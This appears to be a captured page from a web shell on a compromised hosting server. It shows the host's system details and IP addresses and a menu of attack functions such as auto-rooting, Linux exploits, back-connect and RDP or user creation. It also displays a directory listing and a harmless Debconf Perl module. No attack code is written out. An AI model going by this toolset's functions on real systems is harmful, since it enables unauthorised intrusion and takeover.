Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.69.130.109
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
Debconf /
Element /
Gnome /
[ HOME SHELL ]
Name
Size
Permission
Action
Boolean.pm
684
B
-rw-r--r--
Error.pm
1.14
KB
-rw-r--r--
Multiselect.pm
2.42
KB
-rw-r--r--
Note.pm
1.05
KB
-rw-r--r--
Password.pm
580
B
-rw-r--r--
Progress.pm
1.09
KB
-rw-r--r--
Select.pm
974
B
-rw-r--r--
String.pm
649
B
-rw-r--r--
Text.pm
290
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Password.pm
#!/usr/bin/perl -w # This file was preprocessed, do not edit! package Debconf::Element::Gnome::Password; use strict; use Gtk3; use utf8; use base qw(Debconf::Element::Gnome); sub init { my $this=shift; $this->SUPER::init(@_); $this->adddescription; $this->widget(Gtk3::Entry->new); $this->widget->show; $this->widget->set_visibility(0); $this->addwidget($this->widget); $this->tip( $this->widget ); $this->addhelp; } sub value { my $this=shift; my $text = $this->widget->get_chars(0, -1); $text = $this->question->value if $text eq ''; return $text; } 1
Close